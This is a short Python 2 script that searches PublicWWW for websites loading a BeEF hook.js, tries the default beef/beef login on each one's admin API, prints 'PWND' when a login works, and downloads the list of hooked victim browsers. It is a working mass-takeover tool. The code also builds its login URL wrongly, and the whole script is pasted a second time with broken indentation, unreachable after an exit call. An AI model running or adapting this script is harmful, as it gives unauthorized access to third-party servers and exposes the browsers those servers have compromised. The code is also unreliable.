tmap/tritip.py

## tritip.py
import requests
from contextlib import closing
import csv
import sys


api_key = "publicwww_apikey"
search_for_hook_js="%223000%2Fhook.js%22"
try:
	req="https://publicwww.com/websites/"+search_for_hook_js+"/?export=csvsnippets&key="+api_key
	print req
	with closing(requests.get(req, stream=True)) as r:
		reader = csv.reader(r.iter_lines(), delimiter=';', quotechar='"')
		for row in reader:
			try:
				stripped_url= row[2].split('/hook.js', 1)[0]
				url_to_run=stripped_url+'/api/admin/login'
				print stripped_url
				r = requests.post(url_to_run+"/api/admin/login", json = {'username':'beef', 'password':'beef'})
				if r.status_code==200:
					print 'PWND',stripped_url
					data=r.json()
					token=data['token']
					rg = requests.get(url_to_run+'/api/hooks?token='+str(token))
					print rg.text
				elif r.status_code==401:
					print 'Wrong passwd',stripped_url
				else:
					continue
			except:
				pass

except Exception as e:
	print 'Error: %s' % e
	sys.exit(1)
	import requests
	from contextlib import closing
	import csv
	import sys


	api_key = "publicwww_apikey"
	search_for_hook_js="%223000%2Fhook.js%22"
	try:
	req="https://publicwww.com/websites/"+search_for_hook_js+"/?export=csvsnippets&key="+api_key
	print req
	with closing(requests.get(req, stream=True)) as r:
	reader = csv.reader(r.iter_lines(), delimiter=';', quotechar='"')
	for row in reader:
	try:
	stripped_url= row[2].split('/hook.js', 1)[0]
	url_to_run=stripped_url+'/api/admin/login'
	print stripped_url
	r = requests.post(url_to_run+"/api/admin/login", json = {'username':'beef', 'password':'beef'})
	if r.status_code==200:
	print 'PWND',stripped_url
	data=r.json()
	token=data['token']
	rg = requests.get(url_to_run+'/api/hooks?token='+str(token))
	print rg.text
	elif r.status_code==401:
	print 'Wrong passwd',stripped_url
	else:
	continue
	except:
	pass

	except Exception as e:
	print 'Error: %s' % e
	sys.exit(1)